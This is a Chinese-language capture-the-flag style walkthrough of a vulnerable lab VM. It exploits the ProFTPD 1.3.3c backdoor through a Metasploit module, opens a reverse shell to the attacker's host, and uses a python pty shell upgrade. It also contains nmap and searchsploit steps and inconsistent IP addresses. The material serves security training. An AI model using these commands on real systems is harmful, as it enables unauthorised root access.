一、靶场说明

1、下载链接

  链接:https://pan.baidu.com/s/11qkUtAwCTmOFcLa6e-_tyg 提取码:o7cs

2、靶机准备

(1)登录

  用户名:marlinspike

  密码:marlinspike

(2)查看IP

  使用刚才修改的密码进入靶场主机,输入ip a,查看IP地址

img

二、信息搜集

1、发现靶机IP

  可以使用以下两种方法:arp-scan和netdiscover

(1)arp-scan

  使用arp-scan探索靶机IP,发现IP地址为192.168.43.165

arp-scan -l

img

(2)netdiscover

  使用以下命令查看Kali本机IP为192.168.1.108

ip a

img

  使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机

netdiscover -r 192.168.1.1/24

img

2、开放端口与服务探测

  对IP地址进行扫描

nmap -sV 192.168.1.103

  发现开启了FTP服务,且版本为 ProFTPD 1.3.3c,而该版本的FTP是存在漏洞的

img

三、漏洞利用

1、搜索漏洞exploit

  Kali使用以下命令查看是否有漏洞利用模块

searchsploit ProFTPD 1.3.3c

img

  打开msf,搜索该版本FTP,查看是否有漏洞利用模,发现漏洞利用模块

search ProFTPD 1.3.3c

img

2、exploit

use exploit/unix/ftp/proftpd_133c_backdoor  # 使用该漏洞模块
show payloads # 查看可使用的payload
set payload cmd/unix/reverse # 选择该攻击载荷
set RHOSTS [靶机IP] # 设置目标IP
set LHOST [攻击机IP] # 设置本地IP
exploit # 发起攻击

img

3、提权

  使用以下命令查看相关信息,发现已经是root权限了,无需提权

id
whoami
pwd

  python调用本地shell实现交互式命令行,同时美化命令行

python -c "import pty;pty.spawn('/bin/bash')"

img

四、充电站

1、什么是FTP

  是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。

  FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114)至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。

  FTP 的目标是提高文件的共享性,提供非直接使用远程计算机,使存储介质对用户透明和可靠高效地传送数据。它能操作任何类型的文件而不需要进一步处理,就像MIME或Unicode一样。但是,FTP有着极高的延时,这意味着,从开始请求到第一次接收需求数据之间的时间,会非常长;并且不时的必须执行一些冗长的登录进程

2、searchsploit是什么

  顾名思义,它将搜索所有的漏洞和shellcode。它不会包含任何文件和谷歌黑客数据库的结果

  searchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-DB二进制文件中找到。

  如果您预计您将在一个没有Internet的网络环境进行渗透测试,请确保您检查了两个存储库,以获得最完整的数据集